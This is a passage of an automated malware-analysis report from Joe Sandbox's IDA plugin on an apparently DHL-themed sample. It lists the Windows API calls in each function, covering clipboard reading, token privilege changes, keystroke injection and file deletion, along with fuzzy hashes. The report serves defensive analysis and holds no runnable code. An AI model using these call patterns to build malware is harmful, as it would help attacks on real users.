                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000C9B3B
                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 000C9B4A
                                                                                      • GetCursorPos.USER32(?), ref: 000C9B68
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C9B75
                                                                                      • GetParent.USER32(?), ref: 000C9B93
                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9BFA
                                                                                      • SendMessageW.USER32 ref: 000C9C2B
                                                                                      • ClientToScreen.USER32(?,?), ref: 000C9C84
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000C9CB4
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9CDE
                                                                                      • SendMessageW.USER32 ref: 000C9D01
                                                                                      • ClientToScreen.USER32(?,?), ref: 000C9D4E
                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000C9D82
                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C9E05
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                      • String ID: @GUI_DRAGID$F$p]
                                                                                      • API String ID: 3429851547-2918536491
                                                                                      • Opcode ID: d7b3a39f89176e71f3bf84fcace8ea57188f6fea81abe2a8b8e9135428002329
                                                                                      • Instruction ID: 4ae8538a34313ba13e026138447850de0aabe5afe67c5335bb0757d0073c06b1
                                                                                      • Opcode Fuzzy Hash: d7b3a39f89176e71f3bf84fcace8ea57188f6fea81abe2a8b8e9135428002329
                                                                                      • Instruction Fuzzy Hash: BA427834208201AFEB25CF28CD88FAEBBE5FF49314F14061DF699976A1D771A960CB51
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 000C48F3
                                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 000C4908
                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 000C4927
                                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 000C494B
                                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 000C495C
                                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 000C497B
                                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 000C49AE
                                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 000C49D4
                                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 000C4A0F
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A56
                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A7E
                                                                                      • IsMenu.USER32(?), ref: 000C4A97
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4AF2
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4B20
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C4B94
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 000C4BE3
                                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 000C4C82
                                                                                      • wsprintfW.USER32 ref: 000C4CAE
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4CC9
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4CF1
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C4D13
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4D33
                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4D5A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                      • String ID: %d/%02d/%02d$p]
                                                                                      • API String ID: 4054740463-435250244
                                                                                      • Opcode ID: ed0d21a5da53238f6599fbcf778f5b4d2e434d8f349f154cb5969773e3c624d7
                                                                                      • Instruction ID: d5968f93b2617f8765b1ffe18ab7b52741b25716baf2c848df20d66d2f9030e1
                                                                                      • Opcode Fuzzy Hash: ed0d21a5da53238f6599fbcf778f5b4d2e434d8f349f154cb5969773e3c624d7
                                                                                      • Instruction Fuzzy Hash: E212BC71A00215ABFB259F28CC59FAE7BF8FF45710F10412DF51AEA2A1DBB89941CB50
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0004F998
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0008F474
                                                                                      • IsIconic.USER32(00000000), ref: 0008F47D
                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 0008F48A
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0008F494
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4AA
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0008F4B1
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4BD
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4CE
                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4D6
                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0008F4DE
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0008F4E1
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F4F6
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F501
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F50B
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F510
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F519
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F51E
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F528
                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F52D
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0008F530
                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0008F557
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 4125248594-2988720461
                                                                                      • Opcode ID: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                                                                      • Instruction ID: 6b534552e183d3afa7291f7dba52558037ffc53d3998300a6cda102c13a3ece0
                                                                                      • Opcode Fuzzy Hash: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                                                                      • Instruction Fuzzy Hash: F8314171A40218BBFB206BB59C4AFBF7EACEB44B50F10006AFA05E61D1C6B55D41AB60
                                                                                      APIs
                                                                                        • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                                                                        • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                                                                        • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00091286
                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 000912A8
                                                                                      • CloseHandle.KERNEL32(?), ref: 000912B9
                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 000912D1
                                                                                      • GetProcessWindowStation.USER32 ref: 000912EA
                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 000912F4
                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00091310
                                                                                        • Part of subcall function 000910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                                                                        • Part of subcall function 000910BF: CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                      • String ID: $default$winsta0
                                                                                      • API String ID: 22674027-1027155976
                                                                                      • Opcode ID: aefe66fe084abb9c2730f5549a318db40e90f95e2b35ef4bfb79cb9a6e503205
                                                                                      • Instruction ID: 50745b41ef0dd2252fa9c0297fcc0c35f53a7f3b80dbeeb373ac516b2de4aaa1
                                                                                      • Opcode Fuzzy Hash: aefe66fe084abb9c2730f5549a318db40e90f95e2b35ef4bfb79cb9a6e503205
                                                                                      • Instruction Fuzzy Hash: 3F81BF71A0020AAFEF219FA4DC49FEE7BF9EF08704F144129FA14B61A1C7758954EB60
                                                                                      APIs
                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                                                                        • Part of subcall function 000910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                                                                        • Part of subcall function 000910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                                                                        • Part of subcall function 000910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                                                                        • Part of subcall function 000910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00090BCC
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00090C00
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090C17
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00090C51
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00090C6D
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00090C84
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00090C8C
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00090C93
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00090CB4
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00090CBB
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00090CEA
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00090D0C
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00090D1E
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D45
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D4C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D55
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D5C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00090D65
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D6C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00090D78
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00090D7F
                                                                                        • Part of subcall function 00091193: GetProcessHeap.KERNEL32(00000008,00090BB1,?,00000000,?,00090BB1,?), ref: 000911A1
                                                                                        • Part of subcall function 00091193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00090BB1,?), ref: 000911A8
                                                                                        • Part of subcall function 00091193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00090BB1,?), ref: 000911B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                                                                      • Instruction ID: d5dddb060d4178d8218017bdb3e3afc50268151a0e25116ef7be52758d608945
                                                                                      • Opcode Fuzzy Hash: d1a753e934f947229b9fe9dac2f8ec98704ec28dab83683a3327bb7f10a2e23c
                                                                                      • Instruction Fuzzy Hash: 8771697290120AAFEF10DFA5DC48FEEBBBCBF05304F144515F918A6291D775AA05DBA0
                                                                                      APIs
                                                                                      • OpenClipboard.USER32(000CCC08), ref: 000AEB29
                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 000AEB37
                                                                                      • GetClipboardData.USER32(0000000D), ref: 000AEB43
                                                                                      • CloseClipboard.USER32 ref: 000AEB4F
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000AEB87
                                                                                      • CloseClipboard.USER32 ref: 000AEB91
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000AEBBC
                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 000AEBC9
                                                                                      • GetClipboardData.USER32(00000001), ref: 000AEBD1
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000AEBE2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000AEC22
                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 000AEC38
                                                                                      • GetClipboardData.USER32(0000000F), ref: 000AEC44
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000AEC55
                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 000AEC77
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AEC94
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 000AECD2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000AECF3
                                                                                      • CountClipboardFormats.USER32 ref: 000AED14
                                                                                      • CloseClipboard.USER32 ref: 000AED59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                      • String ID:
                                                                                      • API String ID: 420908878-0
                                                                                      • Opcode ID: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                                                                      • Instruction ID: db709fe28f0427819330a27a2f820508e89708a75e9ea304bed440e5a403af04
                                                                                      • Opcode Fuzzy Hash: 083db630342df3b71b19e90a7d2064ffe46bc82a6f45b7bcbbc8e1cc26cb6247
                                                                                      • Instruction Fuzzy Hash: 5D61E034204341AFE311EFA4D888F6AB7E8EF85714F14451DF45A9B2A2CB75DD06CB62
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000A69BE
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A6A12
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A4E
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000A6A75
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6AB2
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 000A6ADF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                      • API String ID: 3830820486-3289030164
                                                                                      • Opcode ID: 61315315ca6645c55b580238e3ee99467f12f59f723d4221eb93a047f09c2da8
                                                                                      • Instruction ID: 1010464e94b6e1f5039746b3603dc656ca9ece743af2d672c2268448d7a2c8a7
                                                                                      • Opcode Fuzzy Hash: 61315315ca6645c55b580238e3ee99467f12f59f723d4221eb93a047f09c2da8
                                                                                      • Instruction Fuzzy Hash: 4ED160B2508300AFC315EBA0C885EABB7ECAF89704F44491DF589D7192EB75DA44CB62
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 000A9663
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 000A96A1
                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 000A96BB
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 000A96D3
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A96DE
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 000A96FA
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A974A
                                                                                      • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A9768
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A9772
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A977F
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A978F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1409584000-438819550
                                                                                      • Opcode ID: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                                                                      • Instruction ID: eab9dc92875b6523a15c29596f0574120f6c62b34ac064f479ce50f7c4fa97f0
                                                                                      • Opcode Fuzzy Hash: 0868148d1719e4ad8c02befc547ffe6bc64aa01f7a302afa17aa6b3ed00f8398
                                                                                      • Instruction Fuzzy Hash: A131B3326446196AEB14EFF4EC49EEE77EC9F4A321F104155F919E2090DB34DE848F24
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 000A97BE
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 000A9819
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A9824
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 000A9840
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A9890
                                                                                      • SetCurrentDirectoryW.KERNEL32(000F6B7C), ref: 000A98AE
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 000A98B8
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A98C5
                                                                                      • FindClose.KERNEL32(00000000), ref: 000A98D5
                                                                                        • Part of subcall function 0009DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0009DB00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                      • String ID: *.*
                                                                                      • API String ID: 2640511053-438819550
                                                                                      • Opcode ID: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
                                                                                      • Instruction ID: daad73ee5136a16af65d732cf552373528cc7764132f700469d5b2afd078d132
                                                                                      • Opcode Fuzzy Hash: 6dfd97d26943c1a7fb6fb4f58e001059132458edad261acc6bc2db26627571f6
                                                                                      • Instruction Fuzzy Hash: 2731B2316406196AEF20EFF4EC48EEE77EC9F47321F144155E914A2191DF39DA85CB60
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(?), ref: 000A8257
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 000A8267
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000A8273
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000A8310
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8324
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8356
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000A838C
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1464919966-438819550
                                                                                      • Opcode ID: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                                                                      • Instruction ID: aadbab18307e877921e5c41c3b5c252d94dc07ad87232ce683931a1a60733ca7
                                                                                      • Opcode Fuzzy Hash: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                                                                      • Instruction Fuzzy Hash: 31616C725047459FDB10EF60C844EAEB3E8FF89314F04892EF98997252DB35EA45CB92
                                                                                      APIs
                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                        • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0009D122
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0009D1DD
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0009D1F0
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D20D
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D237
                                                                                        • Part of subcall function 0009D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0009D21C,?,?), ref: 0009D2B2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 0009D253
                                                                                      • FindClose.KERNEL32(00000000), ref: 0009D264
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
